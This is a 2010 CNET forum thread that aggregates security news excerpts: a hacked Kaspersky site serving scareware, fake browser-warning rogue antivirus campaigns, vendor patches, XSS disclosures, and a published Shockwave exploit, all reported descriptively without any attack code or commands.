General discussion

NEWS - October 21, 2010

Hacked Kaspersky server deploys scareware

Last Sunday, for a period of almost four hours, the US site of anti-virus vendor Kaspersky (kasperskyusa.com) deployed scareware on visitors' computers. When asked about the incident by the media, Kaspersky confirmed that it was indeed attacked. Users trying to download anti-virus products were redirected to an external page which pretended to perform a virus scan in a bogus "Windows Explorer" browser window. The page also tried to simulate an infection and scare visitors into downloading a program.

Kaspersky said that it took its server off-line shortly after being informed about the intrusion. However, in the forums, users reported that Kaspersky initially denied the incident and considered it the result of phishing attacks on users who had followed specially crafted links. It's unknown how many users downloaded and installed the scareware.

The criminals apparently managed to compromise the site via a vulnerable server component. Kaspersky said that the hole has since been fixed and that the restored servers are back in operation. The vendor reportedly audited all the servers in the domain. Kaspersky also said that no customer details were stolen in the attack.

http://www.h-online.com/security/news/item/Hacked-Kaspersky-server-deploys-scareware-1110984.html

Also :
Hacked Kaspersky Download Site Directs Users to Fake Antivirus

Hacked Kaspersky Website Infected Users with Scareware

Discussion is locked

Follow
Reply to: NEWS - October 21, 2010
PLEASE NOTE: Do not post advertisements, offensive materials, profanity, or personal attacks. Please remember to be considerate of other members. If you are new to the CNET Forums, please read our CNET Forums FAQ. All submitted content is subject to our Terms of Use.
Reporting: NEWS - October 21, 2010
This post has been flagged and will be reviewed by our staff. Thank you for helping us maintain CNET's great community.
Sorry, there was a problem flagging this post. Please try again now or at a later time.
If you believe this post is offensive or violates the CNET Forums' Usage policies, you can report it below (this will not automatically remove the post). Once reported, our moderators will be notified and the post will be reviewed.
Comments
- Collapse -
'Attack Page' Scam Lurks in Firefox and Chrome

A new malware campaign takes advantage of the "malicious site" warnings commonly displayed by both Firefox and Chrome to trick unsuspecting users into downloading a rogue antivirus application, the security firm F-Secure reported today.

The attack happens when Web surfers visit a page offering "SecurityTool," a known malware application that purports to be antivirus software. On both Firefox and Chrome, a fake warning page then pops up that mimics the messages those browsers normally give users who visit suspect sites.

On Firefox, the warning alert is titled, "Reported Attack Page!" while on Chrome the page reads, "Warning: Visiting this site may harm your computer!" Both such warnings invite users to "Download Updates."

Users who click the download button then end up with a file called "ff_secure_upd.exe" on Firefox or "chrome_secure_upd.exe" on Google's browser; either way, what they really get is the rogue antivirus file and an invitation to pay a license fee for supposed protection.

Firefox users with scripts enabled, in fact, don't even have to click the "Download Updates" button - rather, they'll just be prompted to click "OK" to download "Firefox secure updates." Clicking "Cancel" only results in a repeated warning that updates need to be downloaded, F-Secure reported.

In addition to the "scareware," a hidden iFrame that's also part of the attack loads a Phoenix exploit kit from a different site, the security researcher noted, thereby exposing users to further exploitation.

A Fake "Just Updated"

This latest attack is very similar to one uncovered in July, through which SecurityTool used a similar technique purportedly prompting Firefox users to update their Adobe Flash Player.

In that case, the attack presented users with a fake version of the Firefox "Just Updated" page, which is typically shown when users open the browser for the first time after an update is downloaded. On the fake version, however, the message warned that Adobe Flash Player hadn't yet been updated, and it prompted the user to download a file that is in fact the rogue antivirus software, according to F-Secure.

http://www.pcworld.com/businesscenter/article/208305/attack_page_scam_lurks_in_firefox_and_chrome.html

From F-Secure with screenshots : Reported Attack Site! - Security Tool's Latest Trick

Also : Hackers subvert Firefox security warnings to sling scareware

- Collapse -
Apple Ships Java Patches, Says It May Drop Java From Future
OS X Releases

The more surprising news than the big patch release, though, was Apple's announcement that it has deprecated its Java implementation in OS X, meaning that it may well not include Java in future versions of the OS.

"As of the release of Java for Mac OS X 10.6 Update 3, the version of Java that is ported by Apple, and that ships with Mac OS X, is deprecated," the company said in the notes for the OS X updates released Wednesday.

"This means that the Apple-produced runtime will not be maintained at the same level, and may be removed from future versions of Mac OS X. The Java runtime shipping in Mac OS X 10.6 Snow Leopard, and Mac OS X 10.5 Leopard, will continue to be supported and maintained through the standard support cycles of those products."

Java has become a favorite target of attackers and Java bugs have become such a problem that Microsoft recently issued a warning about the extent of the Java security issues. The company's Malware Protection Center researched the relative number of exploits targeting various widely deployed technologies.

http://threatpost.com/en_us/blogs/apple-ships-java-patches-says-it-may-drop-java-future-os-x-releases-102110
- Collapse -
What Adobe's New PDF Sandbox Really Means For Attackers

Adobe Reader X's 'Protected Mode' will make PDF attacks tougher to execute, but it can't stop every threat

It has been a busy year for Adobe security, issuing multiple patches for zero-day flaws and attacks aimed at its software as attacks on its pervasive Reader application have exploded. Now comes the official announcement of its expected Protected Mode sandboxing feature in the new Adobe Reader Version X. [...]

Adobe's Protected Mode is aimed at stopping attackers from installing malware, recruiting bots, and conducting any malicious activity on a Reader user's machine, Adobe's Arkin says. "The initial implementation of sandboxing is going to restrict the ability of Reader to process on a Windows machine and perform any write calls to the OS -- creating, changing, or deleting a filesystem file, kicking off new process, starting a new app, or tampering with a registry," he says.

An upcoming version of the feature will stop "read" calls from a PDF as well, so an attacker can't read or access file systems, he says.

"We're hoping that [PDF] attacks will [now] be more difficult to carry out and will be less reliable," Arkin says. "Our goal [with sandboxing] was to defend against all potential vulnerabilities that may still be latent in the code and that we haven't found and fixed yet. We want to make attacks the bad guys are trying to do more expensive."

Reader's sandbox does not, however, protect against phishing or social engineering-based lures. "The sandbox does nothing against attacks where you have text inside a PDF that tells you to visit this URL and you submit your credentials [there]," Arkin says.

It can't protect a user from a malicious link embedded in a sandboxed PDF, either. "When you click on it, depending on how you have your settings, you will get a dialog box that asks if you want to open [the link]," Arkin says. If you do, he says, you might be attacked with malicious code.

Nor can it save you from a poorly configured password for your PDF. "A sandbox has nothing to do with the security of the file itself if the wrong person is able to open it," he says. "And if you're using keys to do signatures or other cryptographic operations on PDFs, maybe you need to protect how you store those keys."

And like any software, a sandbox can be broken, says security expert Lucas Lundgren.

http://www.darkreading.com/insiderthreat/security/app-security/showArticle.jhtml?articleID=227900423

- Collapse -
False Positives: When Antivirus Goes Wrong

The Anti-Malware Testing Standards Organization (AMTSO) is currently meeting to discuss, among other things, adoption of guidelines for testing the False Positive (FP) rate for antivirus programs. A False Positive occurs when the antivirus utility erroneously wipes out a file that is not malicious. Protection against viruses is essential, but when that protection backfires it can cause huge problems.

The Worst False Positives

All FPs are not created equal. If the antivirus deletes a brand-new download you can usually mark the file as trusted and try again. But if it deletes an essential system component, which happened to some McAfee users this past April, it can bring down the whole computer.

An antivirus that erroneously wipes out a file present on just 10 computers worldwide hasn't caused as much trouble as one that kills off a file present on 10 million computers. Clearly testers should account for both factors when evaluating a product for false positives, but how do you find out a given file's prevalence? [...]

An Informative Experiment

At AMTSO's request, Austrian test lab AV-Comparatives.org conducted a fairly simple experiment earlier this year, inviting every vendor member of AMTSO to participate. Those who joined the experiment were asked to research and report on the importance and prevalence of 11 specific non-malicious files and how long it took to obtain the necessary information.

Seven vendors chose to participate (anonymously) and the lab also evaluated results obtained directly from four "cloud" detection components. Vendors reported needing from 20 minutes to 5-6 hours for gathering the information, suggesting that most have no automatic technique for obtaining both prevalence and importance data. And just imagine how long it would take for a tester to determine this information for 500 or more samples.

The results were surprisingly varied. In several cases all of the vendors correctly identified the sample's prevalence, but in just as many cases only two of the seven did so. And for more than half the samples none of the vendors turned in a correct importance rating. Neither were the cloud results consistently correct, and of course the cloud reveals nothing about a file's importance.

http://www.pcmag.com/article2/0,2817,2371197,00.asp

- Collapse -
Google releases Chrome 7.0 stable

Nearly seven weeks after the arrival of Chrome 6 on its second birthday, Google has released version 7 of Chrome into the web browser's stable channel. The update includes hundreds of bug fixes, an updated HTML5 parser, support for directory upload and an HTML5 File API, which allows for web-based content to read files stored locally on a user's system. Full AppleScript support has also been added for Mac OS X UI automation, as well as a new options window for managing cookies.

The update, which moves the full version number up to 7.0.517.41, also addresses a total of 11 security vulnerabilities in the WebKi--based browser, including one that Google rates as critical and five high-risk issues. Google says that the critical issue can cause the browser to crash due to an issue with form autofill. The high-risk bugs range from other form related crashes, to URL spoofing, memory corruption and elements issues. The fifth high-risk problem reportedly causes the sandbox worker processes to fail on Linux systems.

http://www.h-online.com/security/news/item/Google-releases-Chrome-7-0-stable-1110978.html

Also See Vulnerabilities & Fixes : Google Chrome Multiple Vulnerabilities

- Collapse -
Posing as Stuxnet removal tool to ?remove? hard disk?s data

Stuxnet, the first Trojan exploiting Windows shortcut vulnerability, has recently been spreading in the wild. Series of expert?s analysis documents as well as many forum topics on Stuxnet have shown the critical level of this worm. Anxiety psychology has made users searching for Stuxnet removal tools on Internet. However, besides some good tools provided by Microsoft, some antivirus companies or IT community, there are many fraud ones. They are created to spread malicious code in large scale.

Recently, our ******** system has detected a particularly dangerous counterfeit tool: instead of cleaning Stuxnet, it will clean everything in your drive C.

http://blog.bkis.com/en/posing-as-stuxnet-removal-tool-to-remove-hard-disk-data/

- Collapse -
FaceTime for Mac opens giant Apple ID security hole

FaceTime for Mac was released yesterday with an apparently slack-jawed, if not exactly gaping, security hole. Macworld Germany has noted that once a user has logged into FaceTime for Mac with his or her Apple ID, the password on the account can be changed from FaceTime without knowledge of the old password, leaving the account ripe for the picking by any passersby of the physical computer.

The sabotage of an Apple ID is as easy as navigating through FaceTime's preferences menu to the "View Account" page. Once there, whoever happens to be sitting at the computer can change the associated account password.

As long as the password satisfies all the security rules, the change instantly applies across the Apple ID account. For example, changing the password in FaceTime and subsequently accessing the iTunes Store will result in a prompt from iTunes to re-enter your password, and the old one will not work.

Signing out of FaceTime won't help, either?the program saves your password to the field, and there's no way to opt out of password memory. FaceTime will not let users delete the only e-mail address associated with the account, so if you've already signed up, you're kind of stuck.

If your account is hijacked, the worst-case scenario is your tormentor going on an iTunes Store shopping spree on your dime. If you're wise to the password change, you can flip the password back just as easily.

http://arstechnica.com/apple/news/2010/10/facetime-for-mac-opens-giant-apple-id-security-hole.ars

- Collapse -
Pill Gangs Besmirch LegitScript Founder

Individuals who normally promote unlicensed, fly-by-night Internet pharmacies recently registered hundreds of hardcore porn and bestiality Web sites using contact information for the founder of a company that has helped to shutter more than 10,000 of these Internet pill mills over the past year, KrebsOnSecurity.com has learned.

The reputation attack is the latest sortie in an increasingly high-profile and high-stakes battle among spammers, online pill purveyors and those trying to shed light on their activities. Around the same time that these fake domains were registered, KrebsOnSecurity.com came under a sustained denial of service attack that traced back to Russian pill gangs .

In the third week of September, hundreds of domains were registered using the name, phone number and former business address of John Horton, founder of LegitScript , an Internet pharmacy verification service. The domains, many containing the word ?adult,? all redirect to a handful of porn and bestiality sites (a partial list is available here , but please tread lightly with these sites because they are definitely not safe for work and may not be safe for your PC).

http://krebsonsecurity.com/2010/10/pill-gangs-besmirch-legitscript-founder/

- Collapse -
Tests show consumer antivirus programs falling behind

The latest tests of consumer of antivirus software released on Tuesday show the products are declining in performance as the number of malicious software programs increases, a trend that does not bode well for consumers.

NSS Labs tested 11 consumer security suites and found that the products are less effective than a year ago as far as blocking the download and execution of malicious software programs. The company also tested if those programs detected and blocked malicious Web sites.

In its tests, the company used new malicious Web sites within minutes of discovery in addition to brand-new malware, which it contends is indicative of the conditions that users would find while browsing the Internet.

The download and execution blocking rate for the top performing product, Trend Micro's Titanium Maximum Security, fell from 96.4 percent to 90.1 percent from the third quarter of 2009 to the same period this year.

Coming in at number two was McAfee's Internet Security at 85.2 percent, followed by F-Secure Internet Security 2010, 80.4 percent; Norman Security Suite, 77.2 percent; Sunbelt VIPRE Antivirus Premium 4, 75.3 percent; Microsoft Security Essentials 2, 75 percent; Panda Internet Security 2011, 73.1 percent; Symantec Norton Internet Security 2010, 72.3 percent; Kaspersky Internet Security 2011, 71.3 percent; Eset Smart Security 4, 60 percent; and AVG's Internet Security 9, 54.8 percent.

All of the rates were lower except for two products: McAfee's Internet Security and F-Secure's Internet Security 2010, which upped their detection and blocking rates by 3.6 percent and .4 percent respectively. The biggest drop occurred for AVG's Internet Security 9, which fell 18.5 percent, and Kaspersky's Internet Security 2011, which fell 16.5 percent, according to NSS Labs.

"Perhaps surprisingly, Microsoft Security Essentials -- a free product -- ranked higher than half of the competition (paid products), including Symantec's market leading product," according to the report.

http://www.computerworld.com/s/article/9191718/Tests_show_consumer_antivirus_programs_falling_behind

- Collapse -
And Yet Even More World of Warcraft Account Phishing

Today I received yet another World of Warcraft account phish. I have been getting these in an increased volume lately and have seen some fakes that are quite good. This one came to my hotmail account and looked very bland: [Screenshot: WoW Account Phish]

Bland but convincing enough. It essentially says that an account name change has been requested and would I kindly confirm the change by logging into the provided link: [Screenshot: Fake BattleNet Account Page]

Had I actually logged into this page my account details would have been stolen but how can a typical user know this? In truth they cannot (which is why your basic cybercriminal does it of course) unless they are using the right technologies to protect themselves and know what to look for. I did some digging and found VERY quickly that this site was not what it seemed. First of all the actual address is incorrect (BattleNet's real address is battle.net) and it is marked Green by our SiteAdvisor technology:

Continued @ McAfee Labs

- Collapse -
Rogueware Targets Russians With Pay via SMS Scam

We?ve monitored the Rogueware threat landscape for quite some time over here at PandaLabs. Every day we see new domain names, product names, and various fake scan HTML templates. The Rogueware threat landscape hardly ever changes in a significant way, but today we came across something interesting. As you may know, most (if not all) of these threats are created in Eastern European countries such as Ukraine and Russia. This pretty much means that the cyber criminals will not deliberately try to infect users in those countries. In fact, some older Rogueware samples were programmed to quit after detecting the Russian keyboard layout. Well, until now that is?

Today we came across a Rogueware site completely constructed in Russian. The site claims to protect computers and social networking profiles against spam, phishing, viruses, and hacking attempts.

Here is what the site looks like: [Screenshot : Russain Rogueware Page]

Here is a Google translate version of the page:
[Screenshot: Russian Rogueware - Google Translate]

After clicking on the download button, we see several features that we can subscribe to (all checked by default). We are then presented with a brief fake scan, followed by a prompt asking us to select our geographic location (Russia by default). Once 1 of 4 mobile providers are selected, a special premium SMS number appears with instructions on retrieving the product activation code. The cost for the SMS activation is 300 Rubles or just about $10 USD.

Continued @ the PandaLabs Blog

- Collapse -
Researcher Develops Small Device to Intercept,...
Modify Electronic Payments

[quote]With bank fraud and attacks against financial institutions and online banking applications having turned into an epidemic, researchers, banks and other concerned parties have been looking for new ways to protect the integrity of financial transactions. A researcher at the University of Cambridge working on the problem has developed a new device that can act as a trusted intermediary to ensure the validity of electronic transactions.

The device, called the Smart Card Detective, is a small, card-sized piece of equipment that, among other things, can be used to verify that the amount shown on a terminal screen is actually the amount of money that is debited from a user's account. The device's creator, Omar Chaudary, said in an interview that he set out to create something that could serve just that main function of being a trusted terminal for electronic transactions, but soon figured out that the SCD could be used for any number of other tasks as well.

"The main idea was to protect users against card-reader attacks that display a lower amount on the terminal than it debits the account for," said Chaudary, who developed the SCD as part of his graduate work at Cambridge. "I wanted to do a device that intercepted the communications between the card and the terminal, so you have a trusted display. Then I realized it's a general-purpose device that can do anything that the EMV protocol can do."[/quote]

http://threatpost.com/en_us/blogs/researcher-develops-small-device-intercept-modify-electronic-payments-102110
- Collapse -
Facebook Sues Accused Spammers in New Lawsuits

Facebook announced it filed three separate lawsuits against spammers this week.

The lawsuits, filed in federal court in San Jose, accuse Steven Richter, Jason Swan, and Max Bounty Inc. of violating the Computer Fraud and Abuse Act, the CAN-SPAM Act and other state and federal laws. Facebook is seeking compensatory, statutory and punitive damages from each.

"According to our complaints, the defendants, among other things, represented that in order to qualify for certain fake or deceptive offers, people had to spam their friends, sign up for automatic mobile phone subscription services, or provide other information," according to Facebook. "We claim that by doing this, they violated the U.S. Computer Fraud and Abuse Act, the Controlling the Assault of Non-Solicited Pornography and Marketing Act (CAN-SPAM), and other state and federal laws."

Facebook has taken spammers to court in the past. In 2008, the company won a massive judgment against Adam Guerbuez and Atlantis Blue Capital totaling $873 million. In addition, Facebook won a $711 million judgment last year against Sanford Wallace.

http://www.eweek.com/c/a/Security/Facebook-Sues-Accused-Spammers-in-New-Lawsuits-262282/

Also: Updates in Facebook?s Fight Against Spam and Spammers

- Collapse -
Killing the zombie cookie

The permanent evercookie presented around four weeks ago is apparently easier to kill than previously thought. The supercookie was presented by Samy Kamkar as a JavaScript API that combines several techniques to store information on a user's PC to create a cookie zombie that is hard to get rid of. HTML5 in particular adds a lot of places to store various data in a browser. With such a cookie in place, web servers can more effectively detect whether a visitor has already been to a web page.

But it's apparently possible, with just a few steps, to delete the distributed information stored by the evercookie, although unfortunately there is no practical user interface to do so. For instance, Jeremiah Grossmann, a browser security specialist, has published directions on how to erase the information in Google's Chrome browser. Under Windows, any Silverlight and Flash cookies must be deleted along with all Internet data (by selecting - Wrench, Tools, Clear Browsing Data).

Dominic White has also published instructions for Firefox. For Safari on Macs, he has even written a short script that deletes the evercookie. However, in his experiments he ran into problems with the mobile version of Safari on the Apple iPhone, where every app uses its own storage for cookies, the cache and HTML5 data.

http://www.h-online.com/security/news/item/Killing-the-zombie-cookie-1123151.html

Prior Posting : The Cookies You Can't Remove

- Collapse -
Facebook games maker sued in privacy flap

A developer of some of Facebook's most popular games has been hit by a federal lawsuit alleging it shared millions of Facebook user IDs with advertisers and data brokers.

The lawsuit alleges that Zynga, maker of six of the top 10 Facebook games, collected and shared the IDs of 218 million users, in violation of federal law and terms of service. It seeks unspecified monetary damages and an injunction preventing the alleged practice from continuing. The suit was filed in US District Court in San Francisco on behalf of Nancy Graf of St. Paul, Minnesota. It seeks class action status so other Facebook users may also be represented.

The action follows an investigation by The Wall Street Journal that found that a large number of Facebook apps, including all of the top 10, transmitted the unique user IDs of those who ran them to outside companies. Zynga ? maker of games such as Farmville, Mafia Wars, and Cafe World ? was found to be ?transmitting personal information about a user's friends to outside companies,? the paper reported.

It remains debatable just how damaging the practice is to user privacy.

http://www.theregister.co.uk/2010/10/20/facebook_games_maker_sued/

- Collapse -
Panda Security releases Mac app
Panda Security has announced Panda Antivirus for Mac. In doing so, the company must answer the same question faced by every other security vendor trying to sell in this market: Do Macs really need protecting?

After all, we still haven't seen any widespread outbreaks of Mac malware - even though it's just as technically feasible to attack the Mac as it is to target Windows. The question is: Will that change?

Not surprisingly, Panda says it will. The company claims to know of 5,000 strains of malware that specifically affect Apple systems. And it says that number will increase: The company predicts that when Mac market share hits 15% (it's now around 10%), Macs will be "massively targeted by hackers."

In the meantime, there are already cross-platform macro viruses, phishing scams, and scareware that can harm Macs as well as Windows PCs. And even if you or your Mac aren't specifically threatened, you can still act as a vector by unknowingly passing along malware targeting other platforms via e-mail.

http://www.macworld.com/article/155041/2010/10/pandasecurityformac.html

Also : Panda Antivirus debuts for the Mac
Panda Security Press Release : Panda Security Launches Panda Antivirus for Mac
- Collapse -
Site is loaded for SEO bear

"Be careful if you?re looking for live coverage of the Chile mine rescue"

Alert reader Marco tipped us off about this one: a web site loaded with 10 landing pages used to poison search results for the Chile mine rescue story. The real agenda was to scam you into installing a rogue security product. Any of the links will redirect your browser to a download site in the familiar co.cc domain. [Screenshot]

These are the URLs. Notice the variations on the theme of "Chile", "mine" and "rescue." [Screenshot]

Clicking on any of the above results in a Firefox browser gets you this: [Screenshot]

It's the "update-your-Firefox-browser" scam, although the page didn't wait for you to click any buttons, it started itself.

That?s detected as VirTool.Win32.Obfuscator.hg!b1 (v) which is commonly used to download other malcode (like maybe a rogue -- see below).

As a side note, we were running the latest version of Firefox, just released today: version 3.6.11:

Continued @ the Sunbelt Blog

- Collapse -
Mozilla releases Firefox & Thunderbird security updates
Mozilla has released updates for the Firefox web browser and for the Thunderbird news and email client, closing a number of critical security vulnerabilities in those open source products. The latest security and stability update to the 3.6.x branch of Firefox addresses a total of 9 security issues , including five that Mozilla lists as critical, two high-level bugs and one rated as moderate.

Critical Firefox bugs include a library loading bug, a location bar (aka the Awesome Bar) property problem, a buffer overflow and memory corruption error when using document.write, a dangling pointer problem and various memory safety hazards, most of which could possibly lead to the execution of remote code. The Mozilla development team have also released Firefox 3.5.14 to address the same vulnerabilities.

http://www.h-online.com/security/news/item/Mozilla-releases-Firefox-Thunderbird-security-updates-1110898.html

See Mozilla Entries In: Vulnerabilities & Fixes
- Collapse -
Critical RealPlayer Update

Real Networks Inc. has released a new version of RealPlayer that fixes at least seven critical vulnerabilities that could be used to compromise host systems remotely if left unpatched.

I?ve never hidden my distaste for this program, mainly due to its history of unnecessarily tracking users, installing oodles of third party software, and serving obnoxious pop-ups. But I realize that many people keep this software installed because a handful of sites still only offer streaming in the RealPlayer format. If you or someone you look after has this program installed, please update it.

The new versions listed in the chart below are not vulnerable to these flaws. Real Networks says it has no evidence that attackers are exploiting any of these flaws yet. The latest versions for all operating systems are available here. [Screenshot: New Versions]

http://krebsonsecurity.com/2010/10/critical-realplayer-update/

- Collapse -
XSS Vulnerabilities Discovered on Eset, Panda and Symantec

A group of White-hat hackers namely Team Elite has discovered XSS (cross-site scripting) flaws of different degrees of seriousness on the online sites belonging to Panda Security, Symantec and ESET. The group notified each of the 3 companies about the problem in order that they may sanitize their websites at the earliest.

States Team Elite that these flaws are capable of causing dangerous and severe phishing attacks. According to it, XSS vulnerabilities are a result of inappropriate activity during coding, which may generate malware such as scripts, worms and other malicious programs that clandestinely enter computers to proliferate bogus e-mails. Essentially, these flaws fuel phishing assaults, the hackers' group notes. Spywared published this on October 5, 2010.

A member of Team Elite elaborated that XSS flaws imposed high risk and attackers exploiting them could capture sensitive information like account login details as well as other credentials. He emphasized that his team didn't execute this kind of activity and they didn't invade any website. They, rather, produced proof-of-concept and created widespread awareness about existing flaws in order that the affected firms could fix the problems for their own benefit, the member stated. Net-security published this on October 4, 2010.

http://www.spamfighter.com/News-15230-XSS-Vulnerabilities-Discovered-on-Eset-Panda-and-Symantec.htm

- Collapse -
Attack Code Published for Adobe Shockwave Zero Day

A security researcher has released an exploit for an unpatched security vulnerability in Adobe's Shockwave Player, warning that the flaw could be targeted to launch drive-by malware download attacks.

Adobe has issued a security advisory to confirm the vulnerability and warn that the public attack code could provide a roadmap for malicious hackers to take complete control of a vulnerable computer.

Adobe rates the issue as "critical" and says the vulnerability affects Shockwave Player 11.5.8.612 and earlier versions for Windows and Mac OS X.

'A critical vulnerability exists in Adobe Shockwave Player 11.5.8.612 and earlier versions on the Windows and Macintosh operating systems. This vulnerability (CVE-2010-3653) could cause a crash and potentially allow an attacker to take control of the affected system. While details about the vulnerability have been disclosed publicly, Adobe is not aware of any attacks exploiting this vulnerability at this time.'

Adobe did not say when a patch would be made available.

http://threatpost.com/en_us/blogs/attack-code-published-adobe-shockwave-zero-day-102110

Also : Adobe Shockwave bitten by code execution bug
See Vulnerabilities & Fixes : Adobe Shockwave Player Memory Corruption Vulnerability

CNET Forums

Forum Info